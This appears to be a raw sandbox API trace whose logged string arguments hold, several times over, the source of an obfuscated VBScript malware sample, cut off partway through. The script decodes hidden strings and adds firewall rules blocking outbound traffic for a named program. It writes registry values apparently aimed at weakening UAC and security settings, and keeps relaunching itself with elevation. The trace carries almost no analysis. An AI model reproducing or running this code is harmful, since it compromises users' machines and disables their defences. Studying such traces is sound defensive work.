(asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 21 [0222.937] wcsncmp (_String1="\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 21 [0222.937] wcsncmp (_String1="\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 76 [0222.937] wcsncmp (_String1="\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0222.937] wcsncmp (_String1="sx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = 